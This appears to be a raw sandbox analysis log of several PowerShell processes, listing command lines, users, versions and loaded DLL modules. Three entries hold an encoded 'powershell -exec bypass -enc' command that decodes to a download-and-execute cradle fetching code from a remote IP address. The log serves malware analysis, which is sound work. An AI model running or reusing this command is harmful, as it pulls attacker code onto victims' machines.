c:\windows\system32\msisip.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\wshext.dll
c:\windows\system32\nsi.dll
c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.mf49f6405#\f72ae7289194b13172020e33d50f6f38\microsoft.management.infrastructure.ni.dll
c:\windows\system32\msasn1.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.transactions\18afe632acb8900be8188ec43a24784d\system.transactions.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.configuration\7ece7799d670cdfc1393b98b0668a046\system.configuration.ni.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\iertutil.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.numerics\de2a832558f95db343e443c365bd3575\system.numerics.ni.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\netutils.dll

PID
2640
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMQAxADIALgA4ADMALgAxADEANgA6ADgAMAA4ADAALwBkAHIAdgAnACkAKQA=
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Image
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.csharp\1648a6a48cb8705ca13d482d0e9a5a4f\microsoft.csharp.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.transactions\18afe632acb8900be8188ec43a24784d\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_32\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.mf49f6405#\f72ae7289194b13172020e33d50f6f38\microsoft.management.infrastructure.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p6f792626#\d4c6baaee5b33b9a03a9afd841050c89\microsoft.powershell.security.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.configuration\7ece7799d670cdfc1393b98b0668a046\system.configuration.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.numerics\de2a832558f95db343e443c365bd3575\system.numerics.ni.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\mscorlib\d1265d6159ea876f9d63ea4c1361b587\mscorlib.ni.dll
c:\windows\system32\profapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.management\945435ba615b8bd1ff688ebfa43fae39\system.management.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\assembly\gac_32\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.dired13b18a9#\0d2b4443c599d5abb019993d813d4e89\system.directoryservices.ni.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.data\add15017f88a7eccb8676d7239297d1c\system.data.ni.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.core\e0fea191b75897ec38735bfc31b89fe0\system.core.ni.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.xml\668bc5e53fd656dc16c9f40ea15e872e\system.xml.ni.dll
c:\windows\system32\lpk.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\ole32.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\microsoft.net\assembly\gac_msil\system.management.automation\v4.0_3.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\system32\wshext.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.manaa57fc8cc#\f708839fba911a86a06614a9e93dff91\system.management.automation.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\nlssorting.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msisip.dll
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\version.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pb378ec07#\f1d8ac3fc151a1b35ead27559bc8a3f2\microsoft.powershell.consolehost.ni.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\sechost.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msctf.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\nsi.dll
c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\atl.dll
c:\windows\system32\mscoree.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system\b75ba99f72f116d8951b0f2bba8c276a\system.ni.dll
c:\windows\system32\credssp.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\webio.dll
c:\windows\system32\wship6.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p521220ea#\8b7fa0532239a80583de711c612815cd\microsoft.powershell.commands.utility.ni.dll
c:\windows\system32\mswsock.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.confe64a9051#\979591075e378389170a3e094c90b43b\system.configuration.install.ni.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasman.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\dhcpcsvc.dll

PID
3112
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\Desktop\ttest.ps1"
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Image
c:\windows\system32\shell32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\user32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\lpk.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\slc.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pb378ec07#\f1d8ac3fc151a1b35ead27559bc8a3f2\microsoft.powershell.consolehost.ni.dll
c:\windows\system32\sechost.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\propsys.dll
c:\windows\system32\srvcli.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.core\e0fea191b75897ec38735bfc31b89fe0\system.core.ni.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system\b75ba99f72f116d8951b0f2bba8c276a\system.ni.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msctf.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\kernel32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\profapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\mscorlib\d1265d6159ea876f9d63ea4c1361b587\mscorlib.ni.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\ole32.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\system32\userenv.dll
c:\windows\system32\imm32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\version.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.manaa57fc8cc#\f708839fba911a86a06614a9e93dff91\system.management.automation.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.mf49f6405#\f72ae7289194b13172020e33d50f6f38\microsoft.management.infrastructure.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\nlssorting.dll
c:\windows\system32\nsi.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.transactions\18afe632acb8900be8188ec43a24784d\system.transactions.ni.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\microsoft.net\assembly\gac_msil\system.management.automation\v4.0_3.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.data\add15017f88a7eccb8676d7239297d1c\system.data.ni.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\wshext.dll
c:\windows\microsoft.net\assembly\gac_32\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\system32\msisip.dll
c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.xml\668bc5e53fd656dc16c9f40ea15e872e\system.xml.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.dired13b18a9#\0d2b4443c599d5abb019993d813d4e89\system.directoryservices.ni.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.numerics\de2a832558f95db343e443c365bd3575\system.numerics.ni.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.management\945435ba615b8bd1ff688ebfa43fae39\system.management.ni.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\assembly\gac_32\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\crypt32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p6f792626#\d4c6baaee5b33b9a03a9afd841050c89\microsoft.powershell.security.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.configuration\7ece7799d670cdfc1393b98b0668a046\system.configuration.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.csharp\1648a6a48cb8705ca13d482d0e9a5a4f\microsoft.csharp.ni.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\wininet.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\netutils.dll

PID
188
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMQAxADIALgA4ADMALgAxADEANgA6ADgAMAA4ADAALwBkAHIAdgAnACkAKQA=
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Image
c:\windows\system32\gdi32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\wintrust.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.management\945435ba615b8bd1ff688ebfa43fae39\system.management.ni.dll
c:\windows\microsoft.net\assembly\gac_32\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system\b75ba99f72f116d8951b0f2bba8c276a\system.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\microsoft.net\assembly\gac_msil\system.management.automation\v4.0_3.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pb378ec07#\f1d8ac3fc151a1b35ead27559bc8a3f2\microsoft.powershell.consolehost.ni.dll
c:\windows\system32\msisip.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.transactions\18afe632acb8900be8188ec43a24784d\system.transactions.ni.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\ole32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\nsi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\assembly\nativeimages_v4.0.30319_32\system.core\e0fea191b75897ec38735bfc31b89fe0\system.core.ni.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\nlssorting.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p6f792626#\d4c6baaee5b33b9a03a9afd841050c89\microsoft.powershell.security.ni.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.dired13b18a9#\0d2b4443c599d5abb019993d813d4e89\system.directoryservices.ni.dll
c:\windows\system32\user32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\msctf.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.configuration\7ece7799d670cdfc1393b98b0668a046\system.configuration.ni.dll
c:\windows\system32\usp10.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\mscorlib\d1265d6159ea876f9d63ea4c1361b587\mscorlib.ni.dll
c:\windows\system32\wshext.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.manaa57fc8cc#\f708839fba911a86a06614a9e93dff91\system.management.automation.ni.dll
c:\windows\system32\crypt32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.xml\668bc5e53fd656dc16c9f40ea15e872e\system.xml.ni.dll
c:\windows\microsoft.net\assembly\gac_32\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\version.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.data\add15017f88a7eccb8676d7239297d1c\system.data.ni.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.mf49f6405#\f72ae7289194b13172020e33d50f6f38\microsoft.management.infrastructure.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.numerics\de2a832558f95db343e443c365bd3575\system.numerics.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.csharp\1648a6a48cb8705ca13d482d0e9a5a4f\microsoft.csharp.ni.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\winhttp.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p521220ea#\8b7fa0532239a80583de711c612815cd\microsoft.powershell.commands.utility.ni.dll
c:\windows\system32\credssp.dll
c:\windows\system32\wshtcpip.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.confe64a9051#\979591075e378389170a3e094c90b43b\system.configuration.install.ni.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\webio.dll
c:\windows\system32\rasman.dll
c:\windows\system32\wship6.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winnsi.dll

PID
2876
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\Desktop\ttest.ps1"
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Image
c:\windows\system32\atl.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\lpk.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\propsys.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\user32.dll
c:\windows\system32\userenv.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\profapi.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\psapi.dll
c:\windows\system32\rsaenh.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.management\945435ba615b8bd1ff688ebfa43fae39\system.management.ni.dll
c:\windows\system32\slc.dll
c:\windows\system32\cscapi.dll
c:\windows\microsoft.net\assembly\gac_msil\system.management.automation\v4.0_3.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\system32\cryptsp.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\mscorlib\d1265d6159ea876f9d63ea4c1361b587\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.data\add15017f88a7eccb8676d7239297d1c\system.data.ni.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.dired13b18a9#\0d2b4443c599d5abb019993d813d4e89\system.directoryservices.ni.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\nsi.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.core\e0fea191b75897ec38735bfc31b89fe0\system.core.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\assembly\gac_32\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\microsoft.net\framework\v4.0.30319\nlssorting.dll
c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system\b75ba99f72f116d8951b0f2bba8c276a\system.ni.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\msisip.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.manaa57fc8cc#\f708839fba911a86a06614a9e93dff91\system.management.automation.ni.dll
c:\windows\system32\wshext.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pb378ec07#\f1d8ac3fc151a1b35ead27559bc8a3f2\microsoft.powershell.consolehost.ni.dll
c:\windows\system32\version.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.xml\668bc5e53fd656dc16c9f40ea15e872e\system.xml.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p6f792626#\d4c6baaee5b33b9a03a9afd841050c89\microsoft.powershell.security.ni.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.csharp\1648a6a48cb8705ca13d482d0e9a5a4f\microsoft.csharp.ni.dll
c:\windows\system32\secur32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.configuration\7ece7799d670cdfc1393b98b0668a046\system.configuration.ni.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.mf49f6405#\f72ae7289194b13172020e33d50f6f38\microsoft.management.infrastructure.ni.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.transactions\18afe632acb8900be8188ec43a24784d\system.transactions.ni.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.numerics\de2a832558f95db343e443c365bd3575\system.numerics.ni.dll
c:\windows\microsoft.net\assembly\gac_32\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\wininet.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\netutils.dll

PID
2560
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMQAxADIALgA4ADMALgAxADEANgA6ADgAMAA4ADAALwBkAHIAdgAnACkAKQA=
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Image
c:\windows\microsoft.net\assembly\gac_msil\system.management.automation\v4.0_3.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\system32\ole32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\user32.dll
c:\windows\system32\oleaut32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.manaa57fc8cc#\f708839fba911a86a06614a9e93dff91\system.management.automation.ni.dll
c:\windows\system32\version.dll
c:\windows\system32\msctf.dll
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\gdi32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\usp10.dll
c:\windows\microsoft.net\framework\v4.0.30319\nlssorting.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system\b75ba99f72f116d8951b0f2bba8c276a\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.core\e0fea191b75897ec38735bfc31b89fe0\system.core.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\atl.dll
c:\windows\system32\lpk.dll
c:\windows\system32\mscoree.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\mscorlib\d1265d6159ea876f9d63ea4c1361b587\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pb378ec07#\f1d8ac3fc151a1b35ead27559bc8a3f2\microsoft.powershell.consolehost.ni.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\psapi.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.dired13b18a9#\0d2b4443c599d5abb019993d813d4e89\system.directoryservices.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ws2_32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.transactions\18afe632acb8900be8188ec43a24784d\system.transactions.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.mf49f6405#\f72ae7289194b13172020e33d50f6f38\microsoft.management.infrastructure.ni.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\assembly\gac_32\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\secur32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\wshext.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.csharp\1648a6a48cb8705ca13d482d0e9a5a4f\microsoft.csharp.ni.dll
c:\windows\microsoft.net\assembly\gac_32\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\system32\msisip.dll
c:\windows\system32\profapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.numerics\de2a832558f95db343e443c365bd3575\system.numerics.ni.dll
c:\windows\system32\msasn1.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.management\945435ba615b8bd1ff688ebfa43fae39\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.xml\668bc5e53fd656dc16c9f40ea15e872e\system.xml.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p6f792626#\d4c6baaee5b33b9a03a9afd841050c89\microsoft.powershell.security.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.data\add15017f88a7eccb8676d7239297d1c\system.data.ni.dll
c:\windows\system32\nsi.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.configuration\7ece7799d670cdfc1393b98b0668a046\system.configuration.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p521220ea#\8b7fa0532239a80583de711c612815cd\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.confe64a9051#\979591075e378389170a3e094c90b43b\system.configuration.install.ni.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\wshtcpip.dll
